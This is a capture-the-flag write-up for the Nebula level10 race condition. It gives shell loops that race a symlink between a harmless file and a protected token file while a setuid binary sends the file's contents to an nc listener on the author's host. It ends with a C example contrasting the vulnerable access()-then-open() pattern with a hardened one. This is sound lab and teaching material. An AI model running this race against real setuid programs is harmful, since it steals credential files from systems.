Ah, race condition at last!
After an initial read of the level we can quickly conclude that it is a standard TOCTOU (time-of-check to time-of-use) vulnerability: the check is done with access(), whose man page itself warns about exactly this race. Apart from that, we need to note that the token is sent over the network, so we have to receive it somehow (nc for the president!).
First things first, we run nc in an infinite loop on our host machine:
host$ while true ; do nc -l 18211 ; done
nc will listen on port 18211 and will not terminate after receiving each message from
Back to the Nebula VM: we need two running terminals.
On the first terminal we execute the following command:
vm$ while true ; do ln -s msg lnk && rm lnk && ln -s /home/flag10/token lnk && rm lnk ; done
This keeps re-creating a dangling symlink, alternating between a harmless target and the token file.
On the second terminal we execute:
vm$ while true ; do /home/flag10/flag10 /tmp/lnk 192.168.1.10 ; done
This runs /home/flag10/flag10 in an infinite loop with /tmp/lnk (our dangling symlink) as the input file.
After a couple of iterations you will see the proper key on your host's nc instance; from here on you only need to run su flag10 with the token as the password.
level10@nebula:/tmp$ su flag10
You have successfully executed getflag on a target account
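To make the bug concrete, here is an added C example (not the level's source and not the author's code) showing the access()-then-open() pattern the race depends on, beside a hardened form that performs the open with the real uid so there is no separate check to race. The sample file and its contents are constructed for the demonstration.

```c
#define _XOPEN_SOURCE 700
#include <errno.h>
#include <fcntl.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Vulnerable pattern: access() checks the path with the *real* uid, open()
 * then uses the *effective* (setuid) uid. Between the two syscalls the path
 * can be re-pointed at a file the real user may not read. */
int open_after_access(const char *path) {
    if (access(path, R_OK) != 0)
        return -1;
    return open(path, O_RDONLY);
}

/* Hardened form: temporarily drop to the real uid and let the kernel do the
 * permission check and the open atomically on the same credentials. */
int open_as_real_user(const char *path) {
    uid_t ruid = getuid(), euid = geteuid();
    if (euid != ruid && seteuid(ruid) != 0)
        return -1;
    int fd = open(path, O_RDONLY);
    int saved_errno = errno;
    if (euid != ruid)
        seteuid(euid);        /* restore privileges for the rest of the program */
    errno = saved_errno;
    return fd;
}

/* Constructed sample file standing in for the token; returns its path. */
const char *make_sample_file(void) {
    static char path[64];
    const char sample[] = "constructed-sample-token\n";
    strcpy(path, "/tmp/toctou_demo_XXXXXX");
    int fd = mkstemp(path);
    if (fd < 0)
        return NULL;
    if (write(fd, sample, sizeof sample - 1) < 0) {
        close(fd);
        return NULL;
    }
    close(fd);
    return path;
}
```

Both functions behave identically when no one races the path; the difference is that the hardened one never grants the setuid program's own access to a path the real user could not open.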